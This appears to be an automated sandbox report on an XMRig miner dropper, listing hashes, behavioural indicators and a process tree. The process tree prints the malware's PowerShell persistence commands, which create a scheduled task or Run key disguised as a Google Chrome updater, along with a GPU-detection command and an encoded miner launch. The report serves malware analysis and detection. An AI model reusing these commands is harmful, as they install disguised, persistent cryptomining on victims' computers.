Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-11-2024 16:07
Static task
static1
Behavioral task
behavioral1
Sample
ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe
Resource
win7-20240903-en
General
-
Target
ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe
-
Size
2.0MB
-
MD5
b280cc4e78a7bff8d072713f8b4beb29
-
SHA1
76e5ab8eda5c292b4f602e8a73c037f4623cb172
-
SHA256
ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1
-
SHA512
51e8208fefa8cb51930468aa172f7b07056bf98281d7baf0108537fbab1291f1fc1826e708dec31f57432f7627eb2bccb3d05dc924b1e38f4b290ecb03c7861d
-
SSDEEP
49152:BMJt5dwHjwTFKLpVI1M5crh/XBSgqJXEjvZ80eYcZxXBkK8jXCv:Bot4DrVaEcugqJUDDcZl4C
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.execonhost.exedescription pid Process procid_target PID 2376 created 3420 2376 ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe 56 PID 2376 created 3420 2376 ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe 56 PID 4368 created 3420 4368 conhost.exe 56 -
Xmrig family
-
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/772-71-0x00007FF76F120000-0x00007FF76F914000-memory.dmp xmrig behavioral2/memory/772-70-0x00007FF76F120000-0x00007FF76F914000-memory.dmp xmrig behavioral2/memory/772-73-0x00007FF76F120000-0x00007FF76F914000-memory.dmp xmrig behavioral2/memory/772-75-0x00007FF76F120000-0x00007FF76F914000-memory.dmp xmrig behavioral2/memory/772-77-0x00007FF76F120000-0x00007FF76F914000-memory.dmp xmrig behavioral2/memory/772-79-0x00007FF76F120000-0x00007FF76F914000-memory.dmp xmrig behavioral2/memory/772-81-0x00007FF76F120000-0x00007FF76F914000-memory.dmp xmrig behavioral2/memory/772-83-0x00007FF76F120000-0x00007FF76F914000-memory.dmp xmrig behavioral2/memory/772-85-0x00007FF76F120000-0x00007FF76F914000-memory.dmp xmrig behavioral2/memory/772-87-0x00007FF76F120000-0x00007FF76F914000-memory.dmp xmrig behavioral2/memory/772-89-0x00007FF76F120000-0x00007FF76F914000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid Process 5016 updater.exe -
Processes:
powershell.exepowershell.exepid Process 2492 powershell.exe 5104 powershell.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exedescription ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Processes:
resource yara_rule behavioral2/memory/772-63-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx behavioral2/memory/772-71-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx behavioral2/memory/772-70-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx behavioral2/memory/772-73-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx behavioral2/memory/772-75-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx behavioral2/memory/772-77-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx behavioral2/memory/772-79-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx behavioral2/memory/772-81-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx behavioral2/memory/772-83-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx behavioral2/memory/772-85-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx behavioral2/memory/772-87-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx behavioral2/memory/772-89-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx behavioral2/memory/772-91-0x00007FF76F120000-0x00007FF76F914000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.execmd.execmd.exedescription ioc Process File created C:\Program Files\Google\Chrome\updater.exe ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepid Process 2376 ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe 2376 ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe 5104 powershell.exe 5104 powershell.exe 2376 ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe 2376 ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe 3228 powershell.exe 3228 powershell.exe 2492 powershell.exe 2492 powershell.exe 4368 conhost.exe 4368 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe 772 conhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 5104 powershell.exe Token: SeIncreaseQuotaPrivilege 5104 powershell.exe Token: SeSecurityPrivilege 5104 powershell.exe Token: SeTakeOwnershipPrivilege 5104 powershell.exe Token: SeLoadDriverPrivilege 5104 powershell.exe Token: SeSystemProfilePrivilege 5104 powershell.exe Token: SeSystemtimePrivilege 5104 powershell.exe Token: SeProfSingleProcessPrivilege 5104 powershell.exe Token: SeIncBasePriorityPrivilege 5104 powershell.exe Token: SeCreatePagefilePrivilege 5104 powershell.exe Token: SeBackupPrivilege 5104 powershell.exe Token: SeRestorePrivilege 5104 powershell.exe Token: SeShutdownPrivilege 5104 powershell.exe Token: SeDebugPrivilege 5104 powershell.exe Token: SeSystemEnvironmentPrivilege 5104 powershell.exe Token: SeRemoteShutdownPrivilege 5104 powershell.exe Token: SeUndockPrivilege 5104 powershell.exe Token: SeManageVolumePrivilege 5104 powershell.exe Token: 33 5104 powershell.exe Token: 34 5104 powershell.exe Token: 35 5104 powershell.exe Token: 36 5104 powershell.exe Token: SeIncreaseQuotaPrivilege 5104 powershell.exe Token: SeSecurityPrivilege 5104 powershell.exe Token: SeTakeOwnershipPrivilege 5104 powershell.exe Token: SeLoadDriverPrivilege 5104 powershell.exe Token: SeSystemProfilePrivilege 5104 powershell.exe Token: SeSystemtimePrivilege 5104 powershell.exe Token: SeProfSingleProcessPrivilege 5104 powershell.exe Token: SeIncBasePriorityPrivilege 5104 powershell.exe Token: SeCreatePagefilePrivilege 5104 powershell.exe Token: SeBackupPrivilege 5104 powershell.exe Token: SeRestorePrivilege 5104 powershell.exe Token: SeShutdownPrivilege 5104 powershell.exe Token: SeDebugPrivilege 5104 powershell.exe Token: SeSystemEnvironmentPrivilege 5104 powershell.exe Token: SeRemoteShutdownPrivilege 5104 powershell.exe Token: SeUndockPrivilege 5104 powershell.exe Token: SeManageVolumePrivilege 5104 powershell.exe Token: 33 5104 powershell.exe Token: 34 5104 powershell.exe Token: 35 5104 powershell.exe Token: 36 5104 powershell.exe Token: SeIncreaseQuotaPrivilege 5104 powershell.exe Token: SeSecurityPrivilege 5104 powershell.exe Token: SeTakeOwnershipPrivilege 5104 powershell.exe Token: SeLoadDriverPrivilege 5104 powershell.exe Token: SeSystemProfilePrivilege 5104 powershell.exe Token: SeSystemtimePrivilege 5104 powershell.exe Token: SeProfSingleProcessPrivilege 5104 powershell.exe Token: SeIncBasePriorityPrivilege 5104 powershell.exe Token: SeCreatePagefilePrivilege 5104 powershell.exe Token: SeBackupPrivilege 5104 powershell.exe Token: SeRestorePrivilege 5104 powershell.exe Token: SeShutdownPrivilege 5104 powershell.exe Token: SeDebugPrivilege 5104 powershell.exe Token: SeSystemEnvironmentPrivilege 5104 powershell.exe Token: SeRemoteShutdownPrivilege 5104 powershell.exe Token: SeUndockPrivilege 5104 powershell.exe Token: SeManageVolumePrivilege 5104 powershell.exe Token: 33 5104 powershell.exe Token: 34 5104 powershell.exe Token: 35 5104 powershell.exe Token: 36 5104 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
powershell.execmd.exedescription pid Process procid_target PID 3228 wrote to memory of 3136 3228 powershell.exe 104 PID 3228 wrote to memory of 3136 3228 powershell.exe 104 PID 3140 wrote to memory of 4416 3140 cmd.exe 116 PID 3140 wrote to memory of 4416 3140 cmd.exe 116 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3420
-
C:\Users\Admin\AppData\Local\Temp\ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe"C:\Users\Admin\AppData\Local\Temp\ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#grrqr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fwcaup#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:3136
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#grrqr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2492
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe bjecouybve2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4368
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
PID:4416
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:4040
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe dawljevacynemhmk 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnasCD7XnRLS04n/3PSQs4Y8p6xe1bGyOY+8Z8xp48QJueDeTETxFigw/gLPZY+zEogUGWJwIe0AnFUo5KGehIuSRD8LakQ2BzY76sQikKRo5YsnCeK/QrMiYGenOchYS4YmzB1SO5TDIHyuOuvYhgcxxFuuLlNJu0EGD3BPwarLoVEPwRT4xy6xyOSAVSH1wbSbPT0AK/BX0WsIoOE2qYBbW+WixLTgx7HjhKf0L4MRjwKSBvXZaWontgosxNwPppX9KP6jbKsfw7RDUuDo3lmia8ZSURXiB81FAoYkSLU7IBM0OymWsiXcl9u5srNjQA0k5GNYIMU+Fr+NfudwZ5jbqLyO1Fcpzprom2yaNY2GpW0EyVPrfNHarAXQ7RU0Of1LBbxblkg3LpJLPkqCsoF9v1d5xB21h7eDMgBuz7Q4hpHFL23KscuMzSbz1a80gIlw/62lQaY2MB6rC/wo0N8JLI5mh3ejpdCL2Fu3Uwdf3h2YDJHY49lSbf2BO3+0/sufm7JB2KrBZSJapq4f7Apf2⤵
- Suspicious behavior: EnumeratesProcesses
PID:772
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Executes dropped EXE
PID:5016
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5b280cc4e78a7bff8d072713f8b4beb29
SHA176e5ab8eda5c292b4f602e8a73c037f4623cb172
SHA256ae3ae350218998f35fe4582d010844c4f62490af30af438c1735e5037d115fc1
SHA51251e8208fefa8cb51930468aa172f7b07056bf98281d7baf0108537fbab1291f1fc1826e708dec31f57432f7627eb2bccb3d05dc924b1e38f4b290ecb03c7861d
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
Filesize
1KB
MD5032ecfae3d898f4ba9779fea44d37004
SHA18b94484cc8f791b1c173eaac0bc5e6bd289c6a95
SHA256711e7c2607a81517e905adf043981cb850bc65dbb2b1f0d4e2dd6c703fb7c38e
SHA51213530538c0ac08c41931085805e76acc036fb18d02d40180593b73120e90027a8b4efabb95cda500a2a52fc4199f08c5f941f44609276add69eb6cdd557398da
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82